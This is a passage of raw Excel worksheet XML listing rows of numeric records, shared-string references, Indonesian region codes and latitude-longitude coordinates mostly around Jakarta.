      <c r="L2390" t="s">
        <v>8042</v>
      </c>
      <c r="M2390">
        <v>3172060001</v>
      </c>
      <c r="N2390">
        <v>3172060</v>
      </c>
      <c r="O2390">
        <v>3172</v>
      </c>
      <c r="P2390">
        <v>31</v>
      </c>
      <c r="Q2390" t="s">
        <v>309</v>
      </c>
      <c r="R2390" t="s">
        <v>48</v>
      </c>
      <c r="S2390" t="s">
        <v>49</v>
      </c>
      <c r="T2390" t="s">
        <v>33</v>
      </c>
      <c r="U2390" s="5">
        <v>10686654</v>
      </c>
      <c r="V2390" s="5" t="s">
        <v>16583</v>
      </c>
      <c r="W2390" s="5">
        <v>-623459</v>
      </c>
      <c r="X2390" t="s">
        <v>20326</v>
      </c>
      <c r="Y2390" t="str">
        <f t="shared" si="37"/>
        <v>-6.23459,106.86654</v>
      </c>
    </row>
    <row r="2391" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2391">
        <v>209139</v>
      </c>
      <c r="B2391" s="1">
        <v>44109</v>
      </c>
      <c r="C2391" s="2">
        <v>8.6111111111111124E-2</v>
      </c>
      <c r="D2391" t="s">
        <v>2648</v>
      </c>
      <c r="E2391" t="s">
        <v>23</v>
      </c>
      <c r="G2391" t="s">
        <v>8043</v>
      </c>
      <c r="H2391" t="s">
        <v>26</v>
      </c>
      <c r="J2391" t="s">
        <v>404</v>
      </c>
      <c r="L2391" t="s">
        <v>8044</v>
      </c>
      <c r="M2391">
        <v>3174020005</v>
      </c>
      <c r="N2391">
        <v>3174020</v>
      </c>
      <c r="O2391">
        <v>3174</v>
      </c>
      <c r="P2391">
        <v>31</v>
      </c>
      <c r="Q2391" t="s">
        <v>30</v>
      </c>
      <c r="R2391" t="s">
        <v>31</v>
      </c>
      <c r="S2391" t="s">
        <v>32</v>
      </c>
      <c r="T2391" t="s">
        <v>33</v>
      </c>
      <c r="U2391" s="5">
        <v>10677090</v>
      </c>
      <c r="V2391" s="5" t="s">
        <v>16399</v>
      </c>
      <c r="W2391" s="5">
        <v>-616654</v>
      </c>
      <c r="X2391" t="s">
        <v>20327</v>
      </c>
      <c r="Y2391" t="str">
        <f t="shared" si="37"/>
        <v>-6.16654,106.77090</v>
      </c>
    </row>
    <row r="2392" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2392">
        <v>209318</v>
      </c>
      <c r="B2392" s="1">
        <v>44109</v>
      </c>
      <c r="C2392" s="2">
        <v>0.24027777777777778</v>
      </c>
      <c r="D2392" t="s">
        <v>2648</v>
      </c>
      <c r="E2392" t="s">
        <v>23</v>
      </c>
      <c r="G2392" t="s">
        <v>8045</v>
      </c>
      <c r="H2392" t="s">
        <v>26</v>
      </c>
      <c r="J2392" t="s">
        <v>8046</v>
      </c>
      <c r="L2392" t="s">
        <v>2716</v>
      </c>
      <c r="M2392">
        <v>3171050001</v>
      </c>
      <c r="N2392">
        <v>3171050</v>
      </c>
      <c r="O2392">
        <v>3171</v>
      </c>
      <c r="P2392">
        <v>31</v>
      </c>
      <c r="Q2392" t="s">
        <v>507</v>
      </c>
      <c r="R2392" t="s">
        <v>508</v>
      </c>
      <c r="S2392" t="s">
        <v>108</v>
      </c>
      <c r="T2392" t="s">
        <v>33</v>
      </c>
      <c r="U2392" s="5">
        <v>10676823</v>
      </c>
      <c r="V2392" s="5" t="s">
        <v>16584</v>
      </c>
      <c r="W2392" s="5">
        <v>-627985</v>
      </c>
      <c r="X2392" t="s">
        <v>20328</v>
      </c>
      <c r="Y2392" t="str">
        <f t="shared" si="37"/>
        <v>-6.27985,106.76823</v>
      </c>
    </row>
    <row r="2393" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2393">
        <v>209321</v>
      </c>
      <c r="B2393" s="1">
        <v>44109</v>
      </c>
      <c r="C2393" s="2">
        <v>0.2388888888888889</v>
      </c>
      <c r="D2393" t="s">
        <v>2648</v>
      </c>
      <c r="E2393" t="s">
        <v>23</v>
      </c>
      <c r="G2393" t="s">
        <v>8047</v>
      </c>
      <c r="H2393" t="s">
        <v>26</v>
      </c>
      <c r="J2393" t="s">
        <v>8046</v>
      </c>
      <c r="L2393" t="s">
        <v>8048</v>
      </c>
      <c r="M2393">
        <v>3171050001</v>
      </c>
      <c r="N2393">
        <v>3171050</v>
      </c>
      <c r="O2393">
        <v>3171</v>
      </c>
      <c r="P2393">
        <v>31</v>
      </c>
      <c r="Q2393" t="s">
        <v>507</v>
      </c>
      <c r="R2393" t="s">
        <v>508</v>
      </c>
      <c r="S2393" t="s">
        <v>108</v>
      </c>
      <c r="T2393" t="s">
        <v>33</v>
      </c>
      <c r="U2393" s="5">
        <v>10676833</v>
      </c>
      <c r="V2393" s="5" t="s">
        <v>16585</v>
      </c>
      <c r="W2393" s="5">
        <v>-627985</v>
      </c>
      <c r="X2393" t="s">
        <v>20328</v>
      </c>
      <c r="Y2393" t="str">
        <f t="shared" si="37"/>
        <v>-6.27985,106.76833</v>
      </c>
    </row>
    <row r="2394" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2394">
        <v>209330</v>
      </c>
      <c r="B2394" s="1">
        <v>44109</v>
      </c>
      <c r="C2394" s="2">
        <v>0.24166666666666667</v>
      </c>
      <c r="D2394" t="s">
        <v>2648</v>
      </c>
      <c r="E2394" t="s">
        <v>23</v>
      </c>
      <c r="G2394" t="s">
        <v>8049</v>
      </c>
      <c r="H2394" t="s">
        <v>26</v>
      </c>
      <c r="J2394" t="s">
        <v>8046</v>
      </c>
      <c r="L2394" t="s">
        <v>8050</v>
      </c>
      <c r="M2394">
        <v>3171050001</v>
      </c>
      <c r="N2394">
        <v>3171050</v>
      </c>
      <c r="O2394">
        <v>3171</v>
      </c>
      <c r="P2394">
        <v>31</v>
      </c>
      <c r="Q2394" t="s">
        <v>507</v>
      </c>
      <c r="R2394" t="s">
        <v>508</v>
      </c>
      <c r="S2394" t="s">
        <v>108</v>
      </c>
      <c r="T2394" t="s">
        <v>33</v>
      </c>
      <c r="U2394" s="5">
        <v>10676801</v>
      </c>
      <c r="V2394" s="5" t="s">
        <v>16586</v>
      </c>
      <c r="W2394" s="5">
        <v>-627989</v>
      </c>
      <c r="X2394" t="s">
        <v>20329</v>
      </c>
      <c r="Y2394" t="str">
        <f t="shared" si="37"/>
        <v>-6.27989,106.76801</v>
      </c>
    </row>
    <row r="2395" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2395">
        <v>211423</v>
      </c>
      <c r="B2395" s="1">
        <v>44112</v>
      </c>
      <c r="C2395" s="2">
        <v>0.43124999999999997</v>
      </c>
      <c r="D2395" t="s">
        <v>2648</v>
      </c>
      <c r="E2395" t="s">
        <v>23</v>
      </c>
      <c r="G2395" t="s">
        <v>8051</v>
      </c>
      <c r="H2395" t="s">
        <v>26</v>
      </c>
      <c r="J2395" t="s">
        <v>8052</v>
      </c>
      <c r="L2395" t="s">
        <v>8053</v>
      </c>
      <c r="M2395">
        <v>3171010003</v>
      </c>
      <c r="N2395">
        <v>3171010</v>
      </c>
      <c r="O2395">
        <v>3171</v>
      </c>
      <c r="P2395">
        <v>31</v>
      </c>
      <c r="Q2395" t="s">
        <v>263</v>
      </c>
      <c r="R2395" t="s">
        <v>264</v>
      </c>
      <c r="S2395" t="s">
        <v>108</v>
      </c>
      <c r="T2395" t="s">
        <v>33</v>
      </c>
      <c r="U2395" s="5">
        <v>10680881</v>
      </c>
      <c r="V2395" s="5" t="s">
        <v>16587</v>
      </c>
      <c r="W2395" s="5">
        <v>-633521</v>
      </c>
      <c r="X2395" t="s">
        <v>20330</v>
      </c>
      <c r="Y2395" t="str">
        <f t="shared" si="37"/>
        <v>-6.33521,106.80881</v>
      </c>
    </row>
    <row r="2396" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2396">
        <v>211430</v>
      </c>
      <c r="B2396" s="1">
        <v>44113</v>
      </c>
      <c r="C2396" s="2">
        <v>0.21944444444444444</v>
      </c>
      <c r="D2396" t="s">
        <v>2648</v>
      </c>
      <c r="E2396" t="s">
        <v>23</v>
      </c>
      <c r="G2396" t="s">
        <v>8054</v>
      </c>
      <c r="H2396" t="s">
        <v>26</v>
      </c>
      <c r="J2396" t="s">
        <v>8055</v>
      </c>
      <c r="L2396" t="s">
        <v>8056</v>
      </c>
      <c r="M2396">
        <v>3171050005</v>
      </c>
      <c r="N2396">
        <v>3171050</v>
      </c>
      <c r="O2396">
        <v>3171</v>
      </c>
      <c r="P2396">
        <v>31</v>
      </c>
      <c r="Q2396" t="s">
        <v>8057</v>
      </c>
      <c r="R2396" t="s">
        <v>508</v>
      </c>
      <c r="S2396" t="s">
        <v>108</v>
      </c>
      <c r="T2396" t="s">
        <v>33</v>
      </c>
      <c r="U2396" s="5">
        <v>10677312</v>
      </c>
      <c r="V2396" s="5" t="s">
        <v>16588</v>
      </c>
      <c r="W2396" s="5">
        <v>-623051</v>
      </c>
      <c r="X2396" t="s">
        <v>20331</v>
      </c>
      <c r="Y2396" t="str">
        <f t="shared" si="37"/>
        <v>-6.23051,106.77312</v>
      </c>
    </row>
    <row r="2397" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2397">
        <v>211481</v>
      </c>
      <c r="B2397" s="1">
        <v>44113</v>
      </c>
      <c r="C2397" s="2">
        <v>0.75723379629629628</v>
      </c>
      <c r="D2397" t="s">
        <v>22</v>
      </c>
      <c r="E2397" t="s">
        <v>23</v>
      </c>
      <c r="F2397" t="s">
        <v>8058</v>
      </c>
      <c r="G2397" t="s">
        <v>8059</v>
      </c>
      <c r="H2397" t="s">
        <v>26</v>
      </c>
      <c r="I2397" t="s">
        <v>555</v>
      </c>
      <c r="J2397" t="s">
        <v>8060</v>
      </c>
      <c r="L2397" t="s">
        <v>8061</v>
      </c>
      <c r="M2397">
        <v>7604030005</v>
      </c>
      <c r="N2397">
        <v>7604030</v>
      </c>
      <c r="O2397">
        <v>7604</v>
      </c>
      <c r="P2397">
        <v>76</v>
      </c>
      <c r="Q2397" t="s">
        <v>8062</v>
      </c>
      <c r="R2397" t="s">
        <v>8062</v>
      </c>
      <c r="S2397" t="s">
        <v>8063</v>
      </c>
      <c r="T2397" t="s">
        <v>8064</v>
      </c>
      <c r="U2397" s="5">
        <v>11906699</v>
      </c>
      <c r="V2397" s="5" t="s">
        <v>16589</v>
      </c>
      <c r="W2397" s="5">
        <v>-255159</v>
      </c>
      <c r="X2397" t="s">
        <v>20332</v>
      </c>
      <c r="Y2397" t="str">
        <f t="shared" si="37"/>
        <v>-2.55159,119.06699</v>
      </c>
    </row>
    <row r="2398" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2398">
        <v>211482</v>
      </c>
      <c r="B2398" s="1">
        <v>44114</v>
      </c>
      <c r="C2398" s="2">
        <v>0.30849537037037039</v>
      </c>
      <c r="D2398" t="s">
        <v>22</v>
      </c>
      <c r="E2398" t="s">
        <v>23</v>
      </c>
      <c r="F2398" t="s">
        <v>8065</v>
      </c>
      <c r="G2398" t="s">
        <v>8066</v>
      </c>
      <c r="H2398" t="s">
        <v>26</v>
      </c>
      <c r="I2398" t="s">
        <v>2139</v>
      </c>
      <c r="J2398" t="s">
        <v>2615</v>
      </c>
      <c r="L2398" t="s">
        <v>8067</v>
      </c>
      <c r="M2398">
        <v>3404070003</v>
      </c>
      <c r="N2398">
        <v>3404070</v>
      </c>
      <c r="O2398">
        <v>3404</v>
      </c>
      <c r="P2398">
        <v>34</v>
      </c>
      <c r="Q2398" t="s">
        <v>8068</v>
      </c>
      <c r="R2398" t="s">
        <v>185</v>
      </c>
      <c r="S2398" t="s">
        <v>1855</v>
      </c>
      <c r="T2398" t="s">
        <v>1856</v>
      </c>
      <c r="U2398" s="5">
        <v>11041116</v>
      </c>
      <c r="V2398" s="5" t="s">
        <v>16590</v>
      </c>
      <c r="W2398" s="5">
        <v>-776140</v>
      </c>
      <c r="X2398" t="s">
        <v>20333</v>
      </c>
      <c r="Y2398" t="str">
        <f t="shared" si="37"/>
        <v>-7.76140,110.41116</v>
      </c>
    </row>
    <row r="2399" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2399">
        <v>211483</v>
      </c>
      <c r="B2399" s="1">
        <v>44114</v>
      </c>
      <c r="C2399" s="2">
        <v>0.49782407407407409</v>
      </c>
      <c r="D2399" t="s">
        <v>22</v>
      </c>
      <c r="E2399" t="s">
        <v>23</v>
      </c>
      <c r="F2399" t="s">
        <v>8069</v>
      </c>
      <c r="H2399" t="s">
        <v>26</v>
      </c>
      <c r="I2399" t="s">
        <v>76</v>
      </c>
      <c r="J2399" t="s">
        <v>2627</v>
      </c>
      <c r="L2399" t="s">
        <v>8070</v>
      </c>
      <c r="M2399">
        <v>3276050004</v>
      </c>
      <c r="N2399">
        <v>3276050</v>
      </c>
      <c r="O2399">
        <v>3276</v>
      </c>
      <c r="P2399">
        <v>32</v>
      </c>
      <c r="Q2399" t="s">
        <v>8071</v>
      </c>
      <c r="R2399" t="s">
        <v>8072</v>
      </c>
      <c r="S2399" t="s">
        <v>185</v>
      </c>
      <c r="T2399" t="s">
        <v>42</v>
      </c>
      <c r="U2399" s="5">
        <v>10683322</v>
      </c>
      <c r="V2399" s="5" t="s">
        <v>16591</v>
      </c>
      <c r="W2399" s="5">
        <v>-635678</v>
      </c>
      <c r="X2399" t="s">
        <v>20334</v>
      </c>
      <c r="Y2399" t="str">
        <f t="shared" si="37"/>
        <v>-6.35678,106.83322</v>
      </c>
    </row>
    <row r="2400" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2400">
        <v>211484</v>
      </c>
      <c r="B2400" s="1">
        <v>44114</v>
      </c>
      <c r="C2400" s="2">
        <v>0.49861111111111112</v>
      </c>
      <c r="D2400" t="s">
        <v>2648</v>
      </c>
      <c r="E2400" t="s">
        <v>23</v>
      </c>
      <c r="G2400" t="s">
        <v>8073</v>
      </c>
      <c r="H2400" t="s">
        <v>26</v>
      </c>
      <c r="J2400" t="s">
        <v>4933</v>
      </c>
      <c r="L2400" t="s">
        <v>8074</v>
      </c>
      <c r="M2400">
        <v>3172030006</v>
      </c>
      <c r="N2400">
        <v>3172030</v>
      </c>
      <c r="O2400">
        <v>3172</v>
      </c>
      <c r="P2400">
        <v>31</v>
      </c>
      <c r="Q2400" t="s">
        <v>462</v>
      </c>
      <c r="R2400" t="s">
        <v>228</v>
      </c>
      <c r="S2400" t="s">
        <v>49</v>
      </c>
      <c r="T2400" t="s">
        <v>33</v>
      </c>
      <c r="U2400" s="5">
        <v>10690220</v>
      </c>
      <c r="V2400" s="5" t="s">
        <v>16592</v>
      </c>
      <c r="W2400" s="5">
        <v>-631733</v>
      </c>
      <c r="X2400" t="s">
        <v>20335</v>
      </c>
      <c r="Y2400" t="str">
        <f t="shared" si="37"/>
        <v>-6.31733,106.90220</v>
      </c>
    </row>
    <row r="2401" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2401">
        <v>211490</v>
      </c>
      <c r="B2401" s="1">
        <v>44114</v>
      </c>
      <c r="C2401" s="2">
        <v>0.51527777777777783</v>
      </c>
      <c r="D2401" t="s">
        <v>2648</v>
      </c>
      <c r="E2401" t="s">
        <v>23</v>
      </c>
      <c r="G2401" t="s">
        <v>8075</v>
      </c>
      <c r="H2401" t="s">
        <v>26</v>
      </c>
      <c r="J2401" t="s">
        <v>8076</v>
      </c>
      <c r="L2401" t="s">
        <v>8077</v>
      </c>
      <c r="M2401">
        <v>3172010002</v>
      </c>
      <c r="N2401">
        <v>3172010</v>
      </c>
      <c r="O2401">
        <v>3172</v>
      </c>
      <c r="P2401">
        <v>31</v>
      </c>
      <c r="Q2401" t="s">
        <v>8078</v>
      </c>
      <c r="R2401" t="s">
        <v>5562</v>
      </c>
      <c r="S2401" t="s">
        <v>49</v>
      </c>
      <c r="T2401" t="s">
        <v>33</v>
      </c>
      <c r="U2401" s="5">
        <v>10685920</v>
      </c>
      <c r="V2401" s="5" t="s">
        <v>16593</v>
      </c>
      <c r="W2401" s="5">
        <v>-633540</v>
      </c>
      <c r="X2401" t="s">
        <v>20336</v>
      </c>
      <c r="Y2401" t="str">
        <f t="shared" si="37"/>
        <v>-6.33540,106.85920</v>
      </c>
    </row>
    <row r="2402" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2402">
        <v>211503</v>
      </c>
      <c r="B2402" s="1">
        <v>44114</v>
      </c>
      <c r="C2402" s="2">
        <v>0.54166666666666663</v>
      </c>
      <c r="D2402" t="s">
        <v>2648</v>
      </c>
      <c r="E2402" t="s">
        <v>23</v>
      </c>
      <c r="G2402" t="s">
        <v>8079</v>
      </c>
      <c r="H2402" t="s">
        <v>26</v>
      </c>
      <c r="J2402" t="s">
        <v>8080</v>
      </c>
      <c r="L2402" t="s">
        <v>8081</v>
      </c>
      <c r="M2402">
        <v>3172030004</v>
      </c>
      <c r="N2402">
        <v>3172030</v>
      </c>
      <c r="O2402">
        <v>3172</v>
      </c>
      <c r="P2402">
        <v>31</v>
      </c>
      <c r="Q2402" t="s">
        <v>228</v>
      </c>
      <c r="R2402" t="s">
        <v>228</v>
      </c>
      <c r="S2402" t="s">
        <v>49</v>
      </c>
      <c r="T2402" t="s">
        <v>33</v>
      </c>
      <c r="U2402" s="5">
        <v>10689035</v>
      </c>
      <c r="V2402" s="5" t="s">
        <v>16594</v>
      </c>
      <c r="W2402" s="5">
        <v>-633638</v>
      </c>
      <c r="X2402" t="s">
        <v>20337</v>
      </c>
      <c r="Y2402" t="str">
        <f t="shared" si="37"/>
        <v>-6.33638,106.89035</v>
      </c>
    </row>
    <row r="2403" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2403">
        <v>211504</v>
      </c>
      <c r="B2403" s="1">
        <v>44114</v>
      </c>
      <c r="C2403" s="2">
        <v>0.53888888888888886</v>
      </c>
      <c r="D2403" t="s">
        <v>2648</v>
      </c>
      <c r="E2403" t="s">
        <v>23</v>
      </c>
      <c r="G2403" t="s">
        <v>8082</v>
      </c>
      <c r="H2403" t="s">
        <v>26</v>
      </c>
      <c r="J2403" t="s">
        <v>8080</v>
      </c>
      <c r="L2403" t="s">
        <v>8081</v>
      </c>
      <c r="M2403">
        <v>3172030004</v>
      </c>
      <c r="N2403">
        <v>3172030</v>
      </c>
      <c r="O2403">
        <v>3172</v>
      </c>
      <c r="P2403">
        <v>31</v>
      </c>
      <c r="Q2403" t="s">
        <v>228</v>
      </c>
      <c r="R2403" t="s">
        <v>228</v>
      </c>
      <c r="S2403" t="s">
        <v>49</v>
      </c>
      <c r="T2403" t="s">
        <v>33</v>
      </c>
      <c r="U2403" s="5">
        <v>10689041</v>
      </c>
      <c r="V2403" s="5" t="s">
        <v>16595</v>
      </c>
      <c r="W2403" s="5">
        <v>-633629</v>
      </c>
      <c r="X2403" t="s">
        <v>20338</v>
      </c>
      <c r="Y2403" t="str">
        <f t="shared" si="37"/>
        <v>-6.33629,106.89041</v>
      </c>
    </row>
    <row r="2404" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2404">
        <v>211509</v>
      </c>
      <c r="B2404" s="1">
        <v>44114</v>
      </c>
      <c r="C2404" s="2">
        <v>0.54375000000000007</v>
      </c>
      <c r="D2404" t="s">
        <v>2648</v>
      </c>
      <c r="E2404" t="s">
        <v>23</v>
      </c>
      <c r="G2404" t="s">
        <v>8083</v>
      </c>
      <c r="H2404" t="s">
        <v>26</v>
      </c>
      <c r="J2404" t="s">
        <v>8080</v>
      </c>
      <c r="L2404" t="s">
        <v>8084</v>
      </c>
      <c r="M2404">
        <v>3172030004</v>
      </c>
      <c r="N2404">
        <v>3172030</v>
      </c>
      <c r="O2404">
        <v>3172</v>
      </c>
      <c r="P2404">
        <v>31</v>
      </c>
      <c r="Q2404" t="s">
        <v>228</v>
      </c>
      <c r="R2404" t="s">
        <v>228</v>
      </c>
      <c r="S2404" t="s">
        <v>49</v>
      </c>
      <c r="T2404" t="s">
        <v>33</v>
      </c>
      <c r="U2404" s="5">
        <v>10689050</v>
      </c>
      <c r="V2404" s="5" t="s">
        <v>16596</v>
      </c>
      <c r="W2404" s="5">
        <v>-633636</v>
      </c>
      <c r="X2404" t="s">
        <v>20339</v>
      </c>
      <c r="Y2404" t="str">
        <f t="shared" si="37"/>
        <v>-6.33636,106.89050</v>
      </c>
    </row>
    <row r="2405" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2405">
        <v>211510</v>
      </c>
      <c r="B2405" s="1">
        <v>44114</v>
      </c>
      <c r="C2405" s="2">
        <v>0.52430555555555558</v>
      </c>
      <c r="D2405" t="s">
        <v>2648</v>
      </c>
      <c r="E2405" t="s">
        <v>23</v>
      </c>
      <c r="G2405" t="s">
        <v>8085</v>
      </c>
      <c r="H2405" t="s">
        <v>26</v>
      </c>
      <c r="J2405" t="s">
        <v>8086</v>
      </c>
      <c r="L2405" t="s">
        <v>8087</v>
      </c>
      <c r="M2405">
        <v>3171050005</v>
      </c>
      <c r="N2405">
        <v>3171050</v>
      </c>
      <c r="O2405">
        <v>3171</v>
      </c>
      <c r="P2405">
        <v>31</v>
      </c>
      <c r="Q2405" t="s">
        <v>8057</v>
      </c>
      <c r="R2405" t="s">
        <v>508</v>
      </c>
      <c r="S2405" t="s">
        <v>108</v>
      </c>
      <c r="T2405" t="s">
        <v>33</v>
      </c>
      <c r="U2405" s="5">
        <v>10677397</v>
      </c>
      <c r="V2405" s="5" t="s">
        <v>16597</v>
      </c>
      <c r="W2405" s="5">
        <v>-622818</v>
      </c>
      <c r="X2405" t="s">
        <v>20340</v>
      </c>
      <c r="Y2405" t="str">
        <f t="shared" si="37"/>
        <v>-6.22818,106.77397</v>
      </c>
    </row>
    <row r="2406" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2406">
        <v>211525</v>
      </c>
      <c r="B2406" s="1">
        <v>44114</v>
      </c>
      <c r="C2406" s="2">
        <v>0.55335648148148142</v>
      </c>
      <c r="D2406" t="s">
        <v>22</v>
      </c>
      <c r="E2406" t="s">
        <v>23</v>
      </c>
      <c r="F2406" t="s">
        <v>8088</v>
      </c>
      <c r="H2406" t="s">
        <v>26</v>
      </c>
      <c r="I2406" t="s">
        <v>1498</v>
      </c>
      <c r="J2406" t="s">
        <v>8089</v>
      </c>
      <c r="L2406" t="s">
        <v>8090</v>
      </c>
      <c r="M2406">
        <v>3171030002</v>
      </c>
      <c r="N2406">
        <v>3171030</v>
      </c>
      <c r="O2406">
        <v>3171</v>
      </c>
      <c r="P2406">
        <v>31</v>
      </c>
      <c r="Q2406" t="s">
        <v>1294</v>
      </c>
      <c r="R2406" t="s">
        <v>364</v>
      </c>
      <c r="S2406" t="s">
        <v>108</v>
      </c>
      <c r="T2406" t="s">
        <v>33</v>
      </c>
      <c r="U2406" s="5">
        <v>10678924</v>
      </c>
      <c r="V2406" s="5" t="s">
        <v>16598</v>
      </c>
      <c r="W2406" s="5">
        <v>-630502</v>
      </c>
      <c r="X2406" t="s">
        <v>20341</v>
      </c>
      <c r="Y2406" t="str">
        <f t="shared" si="37"/>
        <v>-6.30502,106.78924</v>
      </c>
    </row>
    <row r="2407" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2407">
        <v>211526</v>
      </c>
      <c r="B2407" s="1">
        <v>44114</v>
      </c>
      <c r="C2407" s="2">
        <v>0.55569444444444438</v>
      </c>
      <c r="D2407" t="s">
        <v>22</v>
      </c>
      <c r="E2407" t="s">
        <v>23</v>
      </c>
      <c r="F2407" t="s">
        <v>8091</v>
      </c>
      <c r="G2407" t="s">
        <v>8092</v>
      </c>
      <c r="H2407" t="s">
        <v>26</v>
      </c>
      <c r="I2407" t="s">
        <v>908</v>
      </c>
      <c r="J2407" t="s">
        <v>8093</v>
      </c>
      <c r="L2407" t="s">
        <v>8094</v>
      </c>
      <c r="M2407">
        <v>3172020004</v>
      </c>
      <c r="N2407">
        <v>3172020</v>
      </c>
      <c r="O2407">
        <v>3172</v>
      </c>
      <c r="P2407">
        <v>31</v>
      </c>
      <c r="Q2407" t="s">
        <v>7607</v>
      </c>
      <c r="R2407" t="s">
        <v>1644</v>
      </c>
      <c r="S2407" t="s">
        <v>49</v>
      </c>
      <c r="T2407" t="s">
        <v>33</v>
      </c>
      <c r="U2407" s="5">
        <v>10686788</v>
      </c>
      <c r="V2407" s="5" t="s">
        <v>16599</v>
      </c>
      <c r="W2407" s="5">
        <v>-632244</v>
      </c>
      <c r="X2407" t="s">
        <v>20342</v>
      </c>
      <c r="Y2407" t="str">
        <f t="shared" si="37"/>
        <v>-6.32244,106.86788</v>
      </c>
    </row>
    <row r="2408" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2408">
        <v>211605</v>
      </c>
      <c r="B2408" s="1">
        <v>44114</v>
      </c>
      <c r="C2408" s="2">
        <v>0.5995138888888889</v>
      </c>
      <c r="D2408" t="s">
        <v>22</v>
      </c>
      <c r="E2408" t="s">
        <v>23</v>
      </c>
      <c r="F2408" t="s">
        <v>8095</v>
      </c>
      <c r="G2408" t="s">
        <v>8096</v>
      </c>
      <c r="H2408" t="s">
        <v>26</v>
      </c>
      <c r="I2408" t="s">
        <v>904</v>
      </c>
      <c r="J2408" t="s">
        <v>8097</v>
      </c>
      <c r="L2408" t="s">
        <v>8098</v>
      </c>
      <c r="M2408">
        <v>3171040003</v>
      </c>
      <c r="N2408">
        <v>3171040</v>
      </c>
      <c r="O2408">
        <v>3171</v>
      </c>
      <c r="P2408">
        <v>31</v>
      </c>
      <c r="Q2408" t="s">
        <v>411</v>
      </c>
      <c r="R2408" t="s">
        <v>163</v>
      </c>
      <c r="S2408" t="s">
        <v>108</v>
      </c>
      <c r="T2408" t="s">
        <v>33</v>
      </c>
      <c r="U2408" s="5">
        <v>10676037</v>
      </c>
      <c r="V2408" s="5" t="s">
        <v>16600</v>
      </c>
      <c r="W2408" s="5">
        <v>-624024</v>
      </c>
      <c r="X2408" t="s">
        <v>20343</v>
      </c>
      <c r="Y2408" t="str">
        <f t="shared" si="37"/>
        <v>-6.24024,106.76037</v>
      </c>
    </row>
    <row r="2409" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2409">
        <v>211624</v>
      </c>
      <c r="B2409" s="1">
        <v>44114</v>
      </c>
      <c r="C2409" s="2">
        <v>0.61156250000000001</v>
      </c>
      <c r="D2409" t="s">
        <v>22</v>
      </c>
      <c r="E2409" t="s">
        <v>23</v>
      </c>
      <c r="F2409" t="s">
        <v>8099</v>
      </c>
      <c r="G2409" t="s">
        <v>8100</v>
      </c>
      <c r="H2409" t="s">
        <v>26</v>
      </c>
      <c r="I2409" t="s">
        <v>1862</v>
      </c>
      <c r="J2409" t="s">
        <v>8101</v>
      </c>
      <c r="L2409" t="s">
        <v>8102</v>
      </c>
      <c r="M2409">
        <v>3172020004</v>
      </c>
      <c r="N2409">
        <v>3172020</v>
      </c>
      <c r="O2409">
        <v>3172</v>
      </c>
      <c r="P2409">
        <v>31</v>
      </c>
      <c r="Q2409" t="s">
        <v>7607</v>
      </c>
      <c r="R2409" t="s">
        <v>1644</v>
      </c>
      <c r="S2409" t="s">
        <v>49</v>
      </c>
      <c r="T2409" t="s">
        <v>33</v>
      </c>
      <c r="U2409" s="5">
        <v>10687393</v>
      </c>
      <c r="V2409" s="5" t="s">
        <v>16601</v>
      </c>
      <c r="W2409" s="5">
        <v>-631338</v>
      </c>
      <c r="X2409" t="s">
        <v>20344</v>
      </c>
      <c r="Y2409" t="str">
        <f t="shared" si="37"/>
        <v>-6.31338,106.87393</v>
      </c>
    </row>
    <row r="2410" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2410">
        <v>211637</v>
      </c>
      <c r="B2410" s="1">
        <v>44114</v>
      </c>
      <c r="C2410" s="2">
        <v>0.61609953703703701</v>
      </c>
      <c r="D2410" t="s">
        <v>22</v>
      </c>
      <c r="E2410" t="s">
        <v>23</v>
      </c>
      <c r="F2410" t="s">
        <v>8103</v>
      </c>
      <c r="G2410" t="s">
        <v>8104</v>
      </c>
      <c r="H2410" t="s">
        <v>26</v>
      </c>
      <c r="I2410" t="s">
        <v>666</v>
      </c>
      <c r="J2410" t="s">
        <v>4020</v>
      </c>
      <c r="M2410">
        <v>3172020005</v>
      </c>
      <c r="N2410">
        <v>3172020</v>
      </c>
      <c r="O2410">
        <v>3172</v>
      </c>
      <c r="P2410">
        <v>31</v>
      </c>
      <c r="Q2410" t="s">
        <v>3744</v>
      </c>
      <c r="R2410" t="s">
        <v>1644</v>
      </c>
      <c r="S2410" t="s">
        <v>49</v>
      </c>
      <c r="T2410" t="s">
        <v>33</v>
      </c>
      <c r="U2410" s="5">
        <v>10687361</v>
      </c>
      <c r="V2410" s="5" t="s">
        <v>16602</v>
      </c>
      <c r="W2410" s="5">
        <v>-629137</v>
      </c>
      <c r="X2410" t="s">
        <v>20345</v>
      </c>
      <c r="Y2410" t="str">
        <f t="shared" si="37"/>
        <v>-6.29137,106.87361</v>
      </c>
    </row>
    <row r="2411" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2411">
        <v>211686</v>
      </c>
      <c r="B2411" s="1">
        <v>44114</v>
      </c>
      <c r="C2411" s="2">
        <v>0.64618055555555554</v>
      </c>
      <c r="D2411" t="s">
        <v>22</v>
      </c>
      <c r="E2411" t="s">
        <v>23</v>
      </c>
      <c r="F2411" t="s">
        <v>8105</v>
      </c>
      <c r="G2411" t="s">
        <v>8106</v>
      </c>
      <c r="H2411" t="s">
        <v>26</v>
      </c>
      <c r="I2411" t="s">
        <v>380</v>
      </c>
      <c r="J2411" t="s">
        <v>8107</v>
      </c>
      <c r="M2411">
        <v>3171030001</v>
      </c>
      <c r="N2411">
        <v>3171030</v>
      </c>
      <c r="O2411">
        <v>3171</v>
      </c>
      <c r="P2411">
        <v>31</v>
      </c>
      <c r="Q2411" t="s">
        <v>363</v>
      </c>
